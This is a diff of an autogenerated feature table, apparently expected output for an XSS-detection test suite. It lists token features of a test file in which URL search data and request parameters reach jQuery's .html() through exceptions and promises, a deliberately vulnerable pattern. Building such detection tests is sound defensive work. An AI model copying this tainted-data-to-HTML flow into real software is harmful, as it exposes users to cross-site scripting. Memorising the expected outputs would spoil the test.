contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19219,6 +129993,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:138:6:138:11 | 'myId' | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | | autogenerated/Xss/ExceptionXss/exception-xss.js:138:6:138:11 | 'myId' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ExceptionXss/exception-xss.js:138:6:138:11 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:14:138:17 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:14:138:17 | html | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:14:138:17 | html | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:14:138:17 | html | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:14:138:17 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:138:19:138:23 | error | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:138:19:138:23 | error | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:138:19:138:23 | error | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19226,6 +130005,36 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:138:19:138:23 | error | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | | autogenerated/Xss/ExceptionXss/exception-xss.js:138:19:138:23 | error | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ExceptionXss/exception-xss.js:138:19:138:23 | error | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:3 | $ | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:3 | $ | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:3 | $ | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:11 | $('myId') | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:11 | $('myId') | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:11 | $('myId') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:11 | exceptional return of $('myId') | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:11 | exceptional return of $('myId') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:16 | $('myId').html | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:16 | $('myId').html | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:16 | $('myId').html | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:21 | $('myId').html(res) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:21 | $('myId').html(res) | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:21 | $('myId').html(res) | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:21 | $('myId').html(res) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:21 | $('myId').html(res) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:21 | exceptional return of $('myId').html(res) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:21 | exceptional return of $('myId').html(res) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:21 | exceptional return of $('myId').html(res) | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:21 | exceptional return of $('myId').html(res) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:3:141:21 | exceptional return of $('myId').html(res) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:141:5:141:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:141:5:141:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:141:5:141:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19233,6 +130042,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:141:5:141:10 | 'myId' | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | | autogenerated/Xss/ExceptionXss/exception-xss.js:141:5:141:10 | 'myId' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ExceptionXss/exception-xss.js:141:5:141:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:13:141:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:13:141:16 | html | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:13:141:16 | html | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:13:141:16 | html | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:141:13:141:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:141:18:141:20 | res | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:141:18:141:20 | res | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:141:18:141:20 | res | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19240,6 +130054,173 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:141:18:141:20 | res | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | | autogenerated/Xss/ExceptionXss/exception-xss.js:141:18:141:20 | res | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ExceptionXss/exception-xss.js:141:18:141:20 | res | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:1:177:2 | (functi ... \\t});\\n}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:1:177:2 | (functi ... \\t});\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:1:177:2 | (functi ... \\t});\\n}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:1:177:4 | (functi ... );\\n})() | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:1:177:4 | (functi ... );\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:1:177:4 | (functi ... );\\n})() | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:1:177:4 | exceptional return of (functi ... );\\n})() | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:1:177:4 | exceptional return of (functi ... );\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:1:177:4 | exceptional return of (functi ... );\\n})() | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:145:1 | this | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:145:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:145:1 | this | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:145:1 | this | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:145:1 | this | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:145:2 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:145:2 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:145:2 | foo | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:145:2 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:145:2 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:145:2 | inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:145:2 | inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:145:2 | inner | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:145:2 | inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:145:2 | inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | 'arguments' object of anonymous function | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | 'arguments' object of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | exceptional return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | exceptional return of anonymous function | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | exceptional return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | functio ... \\n\\t});\\n} | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | functio ... \\n\\t});\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | functio ... \\n\\t});\\n} | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | return of anonymous function | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:145:2:177:1 | return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:8 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:8 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:8 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:8 | foo | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:8 | foo | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:8 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:8 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:8 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:35 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:35 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:35 | foo | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:35 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:35 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:35 | foo = d ... .search | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:35 | foo = d ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:35 | foo = d ... .search | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:35 | foo = d ... .search | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:6:146:35 | foo = d ... .search | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:12:146:19 | document | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:12:146:19 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:12:146:19 | document | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:12:146:19 | document | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:12:146:19 | document | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:12:146:28 | document.location | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:12:146:28 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:12:146:28 | document.location | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:12:146:28 | document.location | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:12:146:28 | document.location | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:12:146:35 | documen ... .search | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:12:146:35 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:12:146:35 | documen ... .search | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:12:146:35 | documen ... .search | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:12:146:35 | documen ... .search | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:21:146:28 | location | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:21:146:28 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:21:146:28 | location | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:21:146:28 | location | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:21:146:28 | location | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:30:146:35 | search | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:30:146:35 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:30:146:35 | search | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:30:146:35 | search | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:146:30:146:35 | search | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:148:46 | exceptional return of new Pro ... solve)) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:148:46 | exceptional return of new Pro ... solve)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:148:46 | exceptional return of new Pro ... solve)) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:148:46 | exceptional return of new Pro ... solve)) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:148:46 | exceptional return of new Pro ... solve)) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:148:46 | new Pro ... solve)) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:148:46 | new Pro ... solve)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:148:46 | new Pro ... solve)) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:148:46 | new Pro ... solve)) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:148:46 | new Pro ... solve)) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:148:52 | new Pro ... ).catch | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:148:52 | new Pro ... ).catch | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:148:52 | new Pro ... ).catch | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:148:52 | new Pro ... ).catch | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:148:52 | new Pro ... ).catch | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:150:3 | exceptional return of new Pro ... OK\\n\\t}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:150:3 | exceptional return of new Pro ... OK\\n\\t}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:150:3 | exceptional return of new Pro ... OK\\n\\t}) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:150:3 | exceptional return of new Pro ... OK\\n\\t}) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:150:3 | exceptional return of new Pro ... OK\\n\\t}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:150:3 | new Pro ... OK\\n\\t}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:150:3 | new Pro ... OK\\n\\t}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:150:3 | new Pro ... OK\\n\\t}) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:150:3 | new Pro ... OK\\n\\t}) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:2:150:3 | new Pro ... OK\\n\\t}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:6:148:12 | Promise | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:6:148:12 | Promise | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:6:148:12 | Promise | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:6:148:12 | Promise | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:6:148:12 | Promise | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:13 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:13 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:148:14:148:13 | foo | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| 